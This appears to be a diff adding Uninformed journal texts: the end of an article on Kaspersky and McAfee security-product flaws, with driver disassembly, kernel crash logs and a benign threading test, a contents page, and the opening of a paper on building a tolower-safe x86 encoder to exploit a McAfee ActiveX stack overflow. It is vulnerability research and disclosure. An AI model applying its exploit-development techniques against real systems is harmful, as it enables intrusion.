+.text:F8220CA0 +.text:F8220CA0 var_20 = dword ptr -20h +.text:F8220CA0 var_1C = dword ptr -1Ch +.text:F8220CA0 var_18 = dword ptr -18h +.text:F8220CA0 var_14 = dword ptr -14h +.text:F8220CA0 var_10 = dword ptr -10h +.text:F8220CA0 var_C = dword ptr -0Ch +.text:F8220CA0 var_8 = dword ptr -8 +.text:F8220CA0 var_4 = dword ptr -4 +.text:F8220CA0 arg_0 = dword ptr 4 +.text:F8220CA0 arg_4 = dword ptr 8 +.text:F8220CA0 arg_8 = dword ptr 0Ch +.text:F8220CA0 +.text:F8220CA0 mov edx, [esp+arg_0] +.text:F8220CA4 sub esp, 20h +.text:F8220CA7 cmp word ptr [edx], 'ZM' +.text:F8220CAC push ebx +.text:F8220CAD push ebp +.text:F8220CAE push esi +.text:F8220CAF push edi +.text:F8220CB0 jnz loc_F8220DE1 +.text:F8220CB6 mov eax, [edx+3Ch] +.text:F8220CB9 add eax, edx +.text:F8220CBB cmp dword ptr [eax], 'EP' +.text:F8220CC1 jnz loc_F8220DE1 +.text:F8220CC7 mov eax, [eax+78h] +.text:F8220CCA mov edi, [esp+30h+arg_4] +.text:F8220CCE add eax, edx +.text:F8220CD0 mov [esp+30h+var_14], eax +.text:F8220CD4 mov esi, [eax+1Ch] +.text:F8220CD7 mov ebx, [eax+24h] +.text:F8220CDA mov ecx, [eax+20h] +.text:F8220CDD add esi, edx +.text:F8220CDF add ebx, edx +.text:F8220CE1 add ecx, edx +.text:F8220CE3 cmp edi, 1000h +.text:F8220CE9 mov [esp+30h+var_4], esi +.text:F8220CED mov [esp+30h+var_C], ebx +.text:F8220CF1 mov [esp+30h+var_18], ecx +.text:F8220CF5 jnb short loc_F8220D27 +.text:F8220CF7 mov ecx, [eax+10h] +.text:F8220CFA mov eax, edi +.text:F8220CFC sub eax, ecx +.text:F8220CFE mov eax, [esi+eax*4] +.text:F8220D01 add eax, edx +.text:F8220D03 mov edx, [esp+30h+arg_8] +.text:F8220D07 test edx, edx +.text:F8220D09 jz loc_F8220DE3 +.text:F8220D0F mov ebx, ecx +.text:F8220D11 shl ebx, 1Eh +.text:F8220D14 sub ebx, ecx +.text:F8220D16 add ebx, edi +.text:F8220D18 pop edi +.text:F8220D19 lea ecx, [esi+ebx*4] +.text:F8220D1C pop esi +.text:F8220D1D pop ebp +.text:F8220D1E mov [edx], ecx +.text:F8220D20 pop ebx +.text:F8220D21 add esp, 20h +.text:F8220D24 retn 0Ch +.text:F8220D27 ; --------------------------------------------------------------------------- +.text:F8220D27 +.text:F8220D27 loc_F8220D27: ; CODE XREF: LookupExportedFunction+55j +.text:F8220D27 mov edi, [eax+14h] +.text:F8220D2A mov [esp+30h+arg_0], 0 +.text:F8220D32 test edi, edi +.text:F8220D34 mov [esp+30h+var_8], edi +.text:F8220D38 jbe loc_F8220DE1 +.text:F8220D3E mov [esp+30h+var_1C], esi +.text:F8220D42 +.text:F8220D42 loc_F8220D42: ; CODE XREF: LookupExportedFunction+13Bj +.text:F8220D42 cmp dword ptr [esi], 0 +.text:F8220D45 jz short loc_F8220DC5 +.text:F8220D47 mov ecx, [eax+18h] +.text:F8220D4A xor ebp, ebp +.text:F8220D4C test ecx, ecx +.text:F8220D4E mov [esp+30h+var_10], ecx +.text:F8220D52 jbe short loc_F8220DC5 +.text:F8220D54 mov edi, [esp+30h+var_18] +.text:F8220D58 mov [esp+30h+var_20], ebx +.text:F8220D5C +.text:F8220D5C loc_F8220D5C: ; CODE XREF: LookupExportedFunction+11Bj +.text:F8220D5C mov ebx, [esp+30h+var_20] +.text:F8220D60 xor esi, esi +.text:F8220D62 mov si, [ebx] +.text:F8220D65 mov ebx, [esp+30h+arg_0] +.text:F8220D69 cmp esi, ebx +.text:F8220D6B jnz short loc_F8220DAA +.text:F8220D6D mov eax, [edi] +.text:F8220D6F mov esi, [esp+30h+arg_4] +.text:F8220D73 add eax, edx +.text:F8220D75 +.text:F8220D75 loc_F8220D75: ; CODE XREF: LookupExportedFunction+F3j +.text:F8220D75 mov bl, [eax] +.text:F8220D77 mov cl, bl +.text:F8220D79 cmp bl, [esi] +.text:F8220D7B jnz short loc_F8220D99 +.text:F8220D7D test cl, cl +.text:F8220D7F jz short loc_F8220D95 +.text:F8220D81 mov bl, [eax+1] +.text:F8220D84 mov cl, bl +.text:F8220D86 cmp bl, [esi+1] 
+.text:F8220D89 jnz short loc_F8220D99 +.text:F8220D8B add eax, 2 +.text:F8220D8E add esi, 2 +.text:F8220D91 test cl, cl +.text:F8220D93 jnz short loc_F8220D75 +.text:F8220D95 +.text:F8220D95 loc_F8220D95: ; CODE XREF: LookupExportedFunction+DFj +.text:F8220D95 xor eax, eax +.text:F8220D97 jmp short loc_F8220D9E +.text:F8220D99 ; --------------------------------------------------------------------------- +.text:F8220D99 +.text:F8220D99 loc_F8220D99: ; CODE XREF: LookupExportedFunction+DBj +.text:F8220D99 ; LookupExportedFunction+E9j +.text:F8220D99 sbb eax, eax +.text:F8220D9B sbb eax, 0FFFFFFFFh +.text:F8220D9E +.text:F8220D9E loc_F8220D9E: ; CODE XREF: LookupExportedFunction+F7j +.text:F8220D9E test eax, eax +.text:F8220DA0 jz short loc_F8220DED +.text:F8220DA2 mov eax, [esp+30h+var_14] +.text:F8220DA6 mov ecx, [esp+30h+var_10] +.text:F8220DAA +.text:F8220DAA loc_F8220DAA: ; CODE XREF: LookupExportedFunction+CBj +.text:F8220DAA mov esi, [esp+30h+var_20] +.text:F8220DAE inc ebp +.text:F8220DAF add esi, 2 +.text:F8220DB2 add edi, 4 +.text:F8220DB5 cmp ebp, ecx +.text:F8220DB7 mov [esp+30h+var_20], esi +.text:F8220DBB jb short loc_F8220D5C +.text:F8220DBD mov ebx, [esp+30h+var_C] +.text:F8220DC1 mov edi, [esp+30h+var_8] +.text:F8220DC5 +.text:F8220DC5 loc_F8220DC5: ; CODE XREF: LookupExportedFunction+A5j +.text:F8220DC5 ; LookupExportedFunction+B2j +.text:F8220DC5 mov ecx, [esp+30h+arg_0] +.text:F8220DC9 mov esi, [esp+30h+var_1C] +.text:F8220DCD inc ecx +.text:F8220DCE add esi, 4 +.text:F8220DD1 cmp ecx, edi +.text:F8220DD3 mov [esp+30h+arg_0], ecx +.text:F8220DD7 mov [esp+30h+var_1C], esi +.text:F8220DDB jb loc_F8220D42 +.text:F8220DE1 +.text:F8220DE1 loc_F8220DE1: ; CODE XREF: LookupExportedFunction+10j +.text:F8220DE1 ; LookupExportedFunction+21j ... +.text:F8220DE1 xor eax, eax +.text:F8220DE3 +.text:F8220DE3 loc_F8220DE3: ; CODE XREF: LookupExportedFunction+69j +.text:F8220DE3 ; LookupExportedFunction+162j +.text:F8220DE3 pop edi +.text:F8220DE4 pop esi +.text:F8220DE5 pop ebp +.text:F8220DE6 pop ebx +.text:F8220DE7 add esp, 20h +.text:F8220DEA retn 0Ch +.text:F8220DED ; --------------------------------------------------------------------------- +.text:F8220DED +.text:F8220DED loc_F8220DED: ; CODE XREF: LookupExportedFunction+100j +.text:F8220DED mov eax, [esp+30h+var_4] +.text:F8220DF1 mov ecx, [esp+30h+arg_0] +.text:F8220DF5 lea ecx, [eax+ecx*4] +.text:F8220DF8 mov eax, [ecx] +.text:F8220DFA add eax, edx +.text:F8220DFC mov edx, [esp+30h+arg_8] +.text:F8220E00 test edx, edx +.text:F8220E02 jz short loc_F8220DE3 +.text:F8220E04 pop edi +.text:F8220E05 pop esi +.text:F8220E06 pop ebp +.text:F8220E07 mov [edx], ecx +.text:F8220E09 pop ebx +.text:F8220E0A add esp, 20h +.text:F8220E0D retn 0Ch +.text:F8220E0D LookupExportedFunction endp + + +User mode calling KAV kernel code directly without a ring 0 transition: + + +kd> bp f824d820 +kd> g +Breakpoint 0 hit +klif!sub_F8231820: +001b:f824d820 83ec08 sub esp,0x8 +kd> kv +ChildEBP RetAddr Args to Child +WARNING: Stack unwind information not available. Following frames may be wrong. 
+0006f4ec 7432f69c 74320000 00000001 00000000 klif!sub_F8231820 +0006f50c 7c9011a7 74320000 00000001 00000000 0x7432f69c +0006f52c 7c91cbab 7432f659 74320000 00000001 ntdll!LdrpCallInitRoutine+0x14 +0006f634 7c916178 00000000 c0150008 00000000 ntdll!LdrpRunInitializeRoutines+0x344 (FPO: [Non-Fpo]) +0006f8e0 7c9162da 00000000 0007ced0 0006fbd4 ntdll!LdrpLoadDll+0x3e5 (FPO: [Non-Fpo]) +0006fb88 7c801bb9 0007ced0 0006fbd4 0006fbb4 ntdll!LdrLoadDll+0x230 (FPO: [Non-Fpo]) +0006fc20 f824d749 0106c0f0 0000000e 0107348c 0x7c801bb9 +0006fd14 7c918dfa 7c90d625 7c90eacf 00000000 klif!loc_F823173D+0xc +0006fe00 7c910551 000712e8 00000044 0006ff0c ntdll!_LdrpInitialize+0x246 (FPO: [Non-Fpo]) +0006fecc 00000000 00072368 00000000 00078c48 ntdll!RtlFreeHeap+0x1e9 (FPO: [Non-Fpo]) +kd> t +klif!sub_F8231820+0x3: +001b:f824d823 53 push ebx +kd> r +eax=0006f3cc ebx=00000000 ecx=00005734 edx=0006f3ea esi=7c882fd3 edi=7432f608 +eip=f824d823 esp=0006ef00 ebp=0006f4ec iopl=0 nv up ei pl nz na po nc +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 +klif!sub_F8231820+0x3: +001b:f824d823 53 push ebx +kd> dg 1b + P Si Gr Pr Lo +Sel Base Limit Type l ze an es ng Flags +---- -------- -------- ---------- - -- -- -- -- -------- +001B 00000000 ffffffff Code RE 3 Bg Pg P Nl 00000cfa +kd> !pte eip + VA f824d823 +PDE at C0300F80 PTE at C03E0934 +contains 01010067 contains 06B78065 +pfn 1010 ---DA--UWEV pfn 6b78 ---DA--UREV + + +KAV crashing the system when stepping through its kernel mode code when called +from user mode (apparently not that reliable after all!): + + +Breakpoint 0 hit +klif!sub_F8231820: +001b:f824d820 83ec08 sub esp,0x8 +kd> u eip +klif!sub_F8231820: +f824d820 ebfe jmp klif!sub_F8231820 (f824d820) +f824d822 085355 or [ebx+0x55],dl +f824d825 56 push esi +f824d826 57 push edi +f824d827 33ed xor ebp,ebp +f824d829 6820d824f8 push 0xf824d820 +f824d82e 896c2418 mov [esp+0x18],ebp +f824d832 896c2414 mov [esp+0x14],ebp +kd> g +Breakpoint 0 hit +klif!sub_F8231820: +001b:f824d820 ebfe jmp klif!sub_F8231820 (f824d820) +kd> g +Breakpoint 0 hit +klif!sub_F8231820: +001b:f824d820 ebfe jmp klif!sub_F8231820 (f824d820) +kd> bd 0 +kd> g +Break instruction exception - code 80000003 (first chance) +******************************************************************************* +* * +* You are seeing this message because you pressed either * +* CTRL+C (if you run kd.exe) or, * +* CTRL+BREAK (if you run WinDBG), * +* on your debugger machine's keyboard. * +* * +* THIS IS NOT A BUG OR A SYSTEM CRASH * +* * +* If you did not intend to break into the debugger, press the "g" key, then * +* press the "Enter" key now. This message might immediately reappear. If it * +* does, press "g" and "Enter" again. * +* * +******************************************************************************* +nt!RtlpBreakWithStatusInstruction: +804e3592 cc int 3 +kd> gu + +*** Fatal System Error: 0x000000d1 + (0x00003592,0x0000001C,0x00000000,0x00003592) + +Break instruction exception - code 80000003 (first chance) +******************************************************************************* +* * +* You are seeing this message because you pressed either * +* CTRL+C (if you run kd.exe) or, * +* CTRL+BREAK (if you run WinDBG), * +* on your debugger machine's keyboard. * +* * +* THIS IS NOT A BUG OR A SYSTEM CRASH * +* * +* If you did not intend to break into the debugger, press the "g" key, then * +* press the "Enter" key now. This message might immediately reappear. If it * +* does, press "g" and "Enter" again. 
* +* * +******************************************************************************* +nt!RtlpBreakWithStatusInstruction: +804e3592 cc int 3 +kd> g +Break instruction exception - code 80000003 (first chance) + +A fatal system error has occurred. +Debugger entered on first try; Bugcheck callbacks have not been invoked. + +A fatal system error has occurred. + +Connected to Windows XP 2600 x86 compatible target, ptr64 FALSE +Loading Kernel Symbols +................................................................................................................ +Loading User Symbols +................................ +Loading unloaded module list +............ +******************************************************************************* +* * +* Bugcheck Analysis * +* * +******************************************************************************* + +Use !analyze -v to get detailed debugging information. + +BugCheck D1, {3592, 1c, 0, 3592} + +*** ERROR: Module load completed but symbols could not be loaded for klif.sys +Probably caused by : hardware + +Followup: MachineOwner +--------- + *** Possible invalid call from 804e331f ( nt!KeUpdateSystemTime+0x160 ) + *** Expected target 804e358e ( nt!DbgBreakPointWithStatus+0x0 ) + +nt!RtlpBreakWithStatusInstruction: +804e3592 cc int 3 +kd> !analyze -v +******************************************************************************* +* * +* Bugcheck Analysis * +* * +******************************************************************************* + +DRIVER_IRQL_NOT_LESS_OR_EQUAL (d1) +An attempt was made to access a pageable (or completely invalid) address at an +interrupt request level (IRQL) that is too high. This is usually +caused by drivers using improper addresses. +If kernel debugger is available get stack backtrace. +Arguments: +Arg1: 00003592, memory referenced +Arg2: 0000001c, IRQL +Arg3: 00000000, value 0 = read operation, 1 = write operation +Arg4: 00003592, address which referenced memory + +Debugging Details: +------------------ + + +READ_ADDRESS: 00003592 + +CURRENT_IRQL: 1c + +FAULTING_IP: ++3592 +00003592 ?? ??? + +PROCESS_NAME: winlogon.exe + +DEFAULT_BUCKET_ID: INTEL_CPU_MICROCODE_ZERO + +BUGCHECK_STR: 0xD1 + +LAST_CONTROL_TRANSFER: from 804e3324 to 00003592 + +FAILED_INSTRUCTION_ADDRESS: ++3592 +00003592 ?? ??? + +POSSIBLE_INVALID_CONTROL_TRANSFER: from 804e331f to 804e358e + +TRAP_FRAME: f7872ce0 -- (.trap fffffffff7872ce0) +ErrCode = 00000000 +eax=00000001 ebx=000275fc ecx=8055122c edx=000003f8 esi=00000005 edi=ddfff298 +eip=00003592 esp=f7872d54 ebp=f7872d64 iopl=0 nv up ei pl nz na pe nc +cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010202 +00003592 ?? ??? +Resetting default scope + +STACK_TEXT: +WARNING: Frame IP not in any known module. Following frames may be wrong. 
+f7872d50 804e3324 00000001 f7872d00 000000d1 0x3592 +f7872d50 f824d820 00000001 f7872d00 000000d1 nt!KeUpdateSystemTime+0x165 +0006f4ec 7432f69c 74320000 00000001 00000000 klif+0x22820 +0006f50c 7c9011a7 74320000 00000001 00000000 ODBC32!_DllMainCRTStartup+0x52 +0006f52c 7c91cbab 7432f659 74320000 00000001 ntdll!LdrpCallInitRoutine+0x14 +0006f634 7c916178 00000000 c0150008 00000000 ntdll!LdrpRunInitializeRoutines+0x344 +0006f8e0 7c9162da 00000000 0007ced0 0006fbd4 ntdll!LdrpLoadDll+0x3e5 +0006fb88 7c801bb9 0007ced0 0006fbd4 0006fbb4 ntdll!LdrLoadDll+0x230 +0006fbf0 7c801d6e 7ffddc00 00000000 00000000 kernel32!LoadLibraryExW+0x18e +0006fc04 7c801da4 0106c0f0 00000000 00000000 kernel32!LoadLibraryExA+0x1f +0006fc20 f824d749 0106c0f0 0000000e 0107348c kernel32!LoadLibraryA+0x94 +00000000 00000000 00000000 00000000 00000000 klif+0x22749 + + +STACK_COMMAND: .trap 0xfffffffff7872ce0 ; kb + +FOLLOWUP_NAME: MachineOwner + +MODULE_NAME: hardware + +IMAGE_NAME: hardware + +DEBUG_FLR_IMAGE_TIMESTAMP: 0 + +BUCKET_ID: CPU_CALL_ERROR + +Followup: MachineOwner +--------- + *** Possible invalid call from 804e331f ( nt!KeUpdateSystemTime+0x160 ) + *** Expected target 804e358e ( nt!DbgBreakPointWithStatus+0x0 ) + +kd> u 804e331f +nt!KeUpdateSystemTime+0x160: +804e331f e86a020000 call nt!DbgBreakPointWithStatus (804e358e) +804e3324 ebb4 jmp nt!KeUpdateSystemTime+0x11b (804e32da) +804e3326 90 nop +804e3327 fb sti +804e3328 8d09 lea ecx,[ecx] +nt!KeUpdateRunTime: +804e332a a11cf0dfff mov eax,[ffdff01c] +804e332f 53 push ebx +804e3330 ff80c4050000 inc dword ptr [eax+0x5c4] + + +2.7. The solution. + +KAV's anti-virus software relies upon many unsafe kernel-mode hacks that put +system stability in jeopardy. Removing unsafe kernel mode hacks like +patching non-exported kernel functions or hooking various system services +without parameter validation is the first step towards fixing the problem. + +Many of the operations KAV uses hooking or other unsafe means for are doable +using documented and safe APIs and conventions that are well-described in the +Windows Device Driver Kit (DDK) and Installable File System Kit (IFS Kit). It +would behoove the KAV programmers to take the time to read and understand the +documented way to do things in the Windows kernel instead of taking a quite +literally hack-and-slash approach that leaves the system at risk of crashes +and potentially even privilege escalation. + +Many of the unsafe practices relied upon by KAV are blocked by PatchGuard on +x64 and will make it significantly harder to release a 64-bit version of KAV's +anti-virus software (which will become increasingly important as computers are +sold with x64 support and run x64 Windows by default). Because 32-bit kernel +drivers cannot be loaded on 64-bit Windows, KAV will need to port their driver +to x64 and deal with PatchGuard. Additionally, assumptions that end user +computers will be uniprocessor are fast becoming obsolete, as most new systems +sold today support HyperThreading or multiple cores. + + +3. The problem: McAfee Internet Security Suite 2006 + +McAfee's Internet Security Suite 2006 package includes a number of programs, +including anti-virus, firewall, and anti-spam software. In particular, +however, this article discusses one particular facet of Internet Security Suite +2006: The McAfee Privacy Service. + +This component is designed to intercept outbound traffic and sanitize it of any +predefined sensitive information before it hits the wire. 
+
+From the very start, if one is familiar with network programming, such a goal
+would appear to be very difficult to practically achieve. For instance, many
+programs send data in a compressed or encrypted form, and there is no common
+way to process such data without writing specialized software for each target
+application. This immediately limits the effectiveness of the Privacy Service
+software's generalized information sanitization process to programs that
+either a) have had specialized handler code written for them, or b) send
+information to the Internet in plaintext. Furthermore, the very act of
+modifying an outbound data stream could potentially cause an application to
+fail (consider the case where an application network protocol includes its own
+checksums of data sent and received, where arbitrary modifications of network
+traffic might cause it to be rejected).
+
+The problem with McAfee Internet Security Suite goes deeper, however. The
+mechanism by which Internet Security Suite intercepts (and potentially alters)
+outbound network traffic is through a Windows-specific mechanism known as an
+LSP (or Layered Service Provider).
+
+LSPs are user mode DLLs that "plug-in" to Winsock (the Windows sockets API) and
+are called for every sockets API call that a user mode program makes. This
+allows easy access to view (and modify) network traffic without going through
+the complexities of writing a conventional kernel driver. An LSP is loaded and
+called in the context of the program making the original socket API call.
+
+This means that for most programs using user mode socket calls, all API calls
+will be redirected through the Internet Security Suite's LSP, for potential
+modification.
+
+If one has been paying attention so far, this approach should already be
+setting off alarms. One serious problem with this approach is that since the
+LSP DLL itself resides in the same address space (and thus has the same
+privileges) as the calling program, there is nothing technically stopping a
+malicious program from modifying the LSP DLL's code to exempt itself from
+alteration, or even bypassing the LSP directly.
+
+Unfortunately, the flaws in the McAfee Privacy Service do not simply end here,
+although already the technical limitations of an LSP for securely intercepting
+and modifying network traffic make this approach (in the author's opinion)
+wholly unsuitable for a program designed to protect a user from having his or
+her private data stolen by malicious software.
+
+Specifically, there are implementation flaws in how the LSP itself handles
+certain socket API calls that may cause otherwise perfectly working software
+to fail when run under McAfee Internet Security Suite 2006. This poses a
+serious problem to software vendors, who are often forced to interoperate with
+pervasive personal security software (such as Internet Security Suite).
+
+The Windows Sockets environment is fully multithreaded and thread-safe, and
+allows programs to call into the sockets API from multiple threads concurrently
+without risk of data corruption or other instability. Unfortunately, the LSP
+provided by McAfee for its Privacy Service software breaks this particular
+portion of the Windows Sockets API contract. 
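+
+To make the contract concrete, consider the following minimal sketch. It is
+hypothetical code written for illustration only (it is not taken from McAfee's
+software or from any test case referenced in this article), but it performs the
+sort of perfectly legal concurrent socket creation, polling, and teardown that
+any well-behaved LSP must tolerate. The specific ways in which the McAfee LSP
+mishandles this kind of usage are described next.
+
+
+#include <winsock2.h>
+#include <windows.h>
+#include <string.h>
+#include <stdio.h>
+
+#pragma comment(lib, "ws2_32.lib")
+
+static DWORD WINAPI worker(LPVOID unused)
+{
+    int i;
+
+    (void)unused;
+
+    for (i = 0; i < 1000; i++) {
+        struct sockaddr_in addr;
+        struct timeval tv = { 0, 0 };
+        fd_set readable;
+        SOCKET s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
+
+        if (s == INVALID_SOCKET)
+            continue;
+
+        memset(&addr, 0, sizeof(addr));
+        addr.sin_family      = AF_INET;
+        addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
+        addr.sin_port        = 0;
+
+        /* Bind, poll, and close; each call is legal from any thread. */
+        if (bind(s, (struct sockaddr *)&addr, sizeof(addr)) == 0) {
+            FD_ZERO(&readable);
+            FD_SET(s, &readable);
+            select(0, &readable, NULL, NULL, &tv);
+        }
+
+        closesocket(s);
+    }
+
+    return 0;
+}
+
+int main(void)
+{
+    WSADATA wsd;
+    HANDLE  threads[4];
+    int     i;
+
+    WSAStartup(MAKEWORD(2, 2), &wsd);
+
+    for (i = 0; i < 4; i++)
+        threads[i] = CreateThread(NULL, 0, worker, NULL, 0, NULL);
+
+    WaitForMultipleObjects(4, threads, TRUE, INFINITE);
+    WSACleanup();
+
+    return 0;
+}
+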
In particular, McAfee's LSP does
+not correctly synchronize access to internal data structures when sockets are
+created or destroyed, often leading to situations where a newly created socket
+handed back to an application program is already mistakenly closed by the
+flawed LSP before the application even sees it.
+
+In addition, the author has also observed a similar synchronization problem
+regarding the implementation of the `select' function in the Privacy Service
+LSP. The select function is used to poll a set of sockets for a series of
+events, such as data being available to read, or buffer space being available
+to send data. The McAfee LSP appears to fail when calls to select are made
+from multiple threads concurrently, however, often appearing to switch a
+socket handle specified by the original application program with an entirely
+different handle. (In Windows, the same handle space is shared by
+socket handles and all other types of kernel objects, such as files or
+processes and threads). This subsequently results in calls to select failing
+in strange ways, or worse, returning that data is available for a particular
+socket when it was in fact available on a different socket entirely.
+
+Both of these flaws result in intermittent failures of correctly written third
+party applications when used in conjunction with McAfee Internet Security Suite
+2006.
+
+3.2. Solution for Software Vendors
+
+If one is stuck in the unfortunate position of being forced to support software
+running under McAfee Internet Security Suite 2006, one potential solution to
+this problem is to manually serialize all calls to select (and other functions
+that create or destroy sockets, such as socket and the WSASocket family of
+functions). This approach has worked in practice, and is perhaps the least
+invasive solution to the flawed LSP.
+
+An alternative solution is to bypass the LSP entirely and instead call directly
+to the kernel sockets driver (AFD.sys). However, this entails determining the
+actual handle associated with a socket (the handle returned by the McAfee LSP
+is in fact not the underlying socket handle), as well as relying on the as-yet
+officially undocumented AFD IOCTL interface.
+
+3.3. Solution for McAfee
+
+From McAfee's perspective, the solution is fairly simple: correctly serialize
+access to internal data structures from function calls that are made from
+multiple threads concurrently.
+
+
+4. Conclusion
+
+As the Internet becomes an increasingly hostile place and the need for in-depth
+personal security software (as a supplement or even replacement for proper
+system administration) grows for end-users, it will become increasingly
+important for the vendors and providers of personal security software to ensure
+that their programs do not impair the normal operation of systems upon which
+their software is installed. The author realizes that such is a very difficult
+task given what is expected of most personal security software suites, and
+hopes that by shedding light on the flaws in existing software, new programs
+can be made to avoid similar mistakes. diff --git a/uninformed/4.txt b/uninformed/4.txt new file mode 100644 index 0000000..0e215bb --- /dev/null +++ b/uninformed/4.txt @@ -0,0 +1,30 @@ +Engineering in Reverse
+Improving Automated Analysis of Windows x64 Binaries
+skape
+As Windows x64 becomes a more prominent platform, it will become necessary to develop techniques that improve the binary analysis process. 
In particular, automated techniques that can be performed prior to doing code or data flow analysis can be useful in getting a better understanding for how a binary operates. To that point, this paper gives a brief explanation of some of the changes that have been made to support Windows x64 binaries. From there, a few basic techniques are illustrated that can be used to improve the process of identifying functions, annotating their stack frames, and describing their exception handler relationships. Source code to an example IDA plugin is also included that shows how these techniques can be implemented. +txt | code.tgz | pdf | html + +Exploitation Technology +Exploiting the Otherwise Non-Exploitable on Windows +Skywing & skape +This paper describes a technique that can be applied in certain situations to gain arbitrary code execution through software bugs that would not otherwise be exploitable, such as NULL pointer dereferences. To facilitate this, an attacker gains control of the top-level unhandled exception filter for a process in an indirect fashion. While there has been previous work illustrating the usefulness in gaining control of the top-level unhandled exception filter, Microsoft has taken steps in XPSP2 and beyond, such as function pointer encoding, to prevent attackers from being able to overwrite and control the unhandled exception filter directly. While this security enhancement is a marked improvement, it is still possible for an attacker to gain control of the top-level unhandled exception filter by taking advantage of a design flaw in the way unhandled exception filters are chained. This approach, however, is limited by an attacker's ability to control the chaining of unhandled exception filters, such as through the loading and unloading of DLLs. This does reduce the global impact of this approach; however, there are some interesting cases where it can be immediately applied, such as with Internet Explorer. +txt | pdf | html + +General Research +Abusing Mach on Mac OS X +nemo +This paper discusses the security implications of Mach being integrated with the Mac OS X kernel. A few examples are used to illustrate how Mach support can be used to bypass some of the BSD security features, such as securelevel. Furthermore, examples are given that show how Mach functions can be used to supplement the limited ptrace functionality included in Mac OS X. +txt | pdf | html + +Rootkit Technology +GREPEXEC: Grepping Executive Objects from Pool Memory +bugcheck +As rootkits continue to evolve and become more advanced, methods that can be used to detect hidden objects must also evolve. For example, relying on system provided APIs to enumerate maintained lists is no longer enough to provide effective cross-view detection. To that point, scanning virtual memory for object signatures has been shown to provide useful, but limited, results. The following paper outlines the theory and practice behind scanning memory for hidden objects. This method relies upon the ability to safely reference the Windows system virtual address space and also depends upon building and locating effective memory signatures. Using this method as a base, suggestions are made as to what actions might be performed once objects are detected. The paper also provides a simple example of how object-independent signatures can be built and used to detect several different kernel objects on all versions of Windows NT+. 
Due to time constraints, the source code associated with this paper will be made publicly available in the near future. +txt | pdf | html + +What Were They Thinking? +Anti-Virus Software Gone Wrong +Skywing +Anti-virus software is becoming more and more prevalent on end-user computers today. Many major computer vendors (such as Dell) bundle anti-virus software and other personal security suites in the default configuration of newly-sold computer systems. As a result, it is becoming increasingly important that anti-virus software be well-designed, secure by default, and interoperable with third-party applications. Software that is installed and running by default constitutes a prime target for attack and, as such, it is especially important that said software be designed with security and interoperability in mind. In particular, this article provides examples of issues found in well-known anti-virus products. These issues range from not properly validating input from an untrusted source (especially within the context of a kernel driver) to failing to conform to API contracts when hooking or implementing an intermediary between applications and the underlying APIs upon which they rely. For popular software, or software that is installed by default, errors of this sort can become a serious problem to both system stability and security. Beyond that, it can impact the ability of independent software vendors to deploy functioning software on end-user systems. +txt | pdf | html + diff --git a/uninformed/5.1.txt b/uninformed/5.1.txt new file mode 100644 index 0000000..36aaf53 --- /dev/null +++ b/uninformed/5.1.txt @@ -0,0 +1,817 @@ +Implementing a Custom X86 Encoder +Aug, 2006 +skape +mmiller@hick.org + + +1) Foreword + +Abstract: This paper describes the process of implementing a custom +encoder for the x86 architecture. To help set the stage, the McAfee +Subscription Manager ActiveX control vulnerability, which was discovered +by eEye, will be used as an example of a vulnerability that requires the +implementation of a custom encoder. In particular, this vulnerability +does not permit the use of uppercase characters. To help make things +more interesting, the encoder described in this paper will also avoid +all characters above 0x7f. This will make the encoder both UTF-8 safe +and tolower safe. + +Challenge: The author believes that a UTF-8 safe and tolower safe +encoder could most likely be implemented in a much more optimized +fashion that incurs far less overhead in terms of size. If any reader +has ideas about ways in which this might be approached, feel free to +contact the author. A bonus challenge would be to identify a geteip +technique that can be used with these character limitations. + + +2) Introduction + +In the month of August, eEye released an advisory for a stack-based +buffer overflow that was found in the McAfee Subscription Manager +ActiveX control. The underlying vulnerability was in an insecure call +to vsprintf that was exposed through scripting-accessible routines. At a +glance, this vulnerability would appear trivial to exploit given that +it's a very basic stack overflow. However, once it comes to +transmitting a payload, or even a particular return address, certain +limiting factors begin to appear. The focus of this paper will center +around an exercise in implementing a custom encoder to overcome certain +character set limitations. 
The McAfee Subscription Manager vulnerability
+will be used as a real-world example of a vulnerability that requires a
+custom encoder to exploit.
+
+When it comes to exploiting this vulnerability, the first step is to
+reproduce the conditions reported in the advisory. Like most
+vulnerabilities, it's customary to send an arbitrary sequence of bytes,
+such as A's. However, in this particular exploit, sending a sequence of
+A's, which equates to 0x41, actually causes the return address to be
+overwritten with 0x61's which are lowercase a's. Judging from this, it
+seems obvious that the input string is undergoing a tolower operation
+and it will not be possible for the payload or return address to contain
+any uppercase characters.
+
+Given these character restrictions, it's safe to go forward with writing
+the exploit. To simply get a proof of concept for code execution, it
+makes sense to put a series of int3's, represented by the 0xcc opcode,
+immediately following the return address. The return address could then
+be pointed to the location of a push esp / ret or some other type of
+instruction that transfers control to where the series of int3's should
+reside. Once the vulnerability is triggered, the debugger should break
+in at an int3 instruction, but that's not actually what happens.
+Instead, it breaks in on a completely different instruction:
+
+
+(4f8.58c): Unknown exception - code c0000096 (!!! second chance !!!)
+eax=00000f19 ebx=00000000 ecx=00139438
+edx=0013a384 esi=00001b58 edi=0013a080
+eip=0013a02c esp=0013a02c ebp=36213365 iopl=0
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
+0013a02c ec in al,dx
+0:000> u eip
+0013a02c ec in al,dx
+0013a02d ec in al,dx
+0013a02e ec in al,dx
+0013a02f ec in al,dx
+
+
+Again, it looks like the buffer is undergoing some sort of transformation. One
+quick thing to notice is that 0xcc + 0x20 = 0xec. This is similar to what
+would happen when changing an uppercase character to a lowercase character,
+such as where 'A', or 0x41, is converted to 'a', or 0x61, by adding 0x20. It
+appears that the operation that's performing the case lowering may also be
+inadvertently performing it on a specific high ASCII range.
+
+What's actually occurring is that the subscription manager control is calling
+_mbslwr, using the statically linked CRT, on a copy of the original input
+string. Internally, _mbslwr calls into __crtLCMapStringA. Eventually this will
+lead to a call out to kernel32!LCMapStringW. The second parameter to this
+routine is dwMapFlags which describes what sort of transformations, if any,
+should be performed on the buffer. The _mbslwr routine passes 0x100, or
+LCMAP_LOWERCASE. This is what results in the lowering of the string.
+
+So, given this information, it can be determined that it will not be possible
+to use characters between and including 0x41 and 0x5A as well as, for the sake
+of clarity, 0xc0 and 0xe0. In actuality, not all of the characters in this
+range are bad. The main reason this ends up causing problems is because many
+of the payload encoders out there for x86, including those in Metasploit, rely
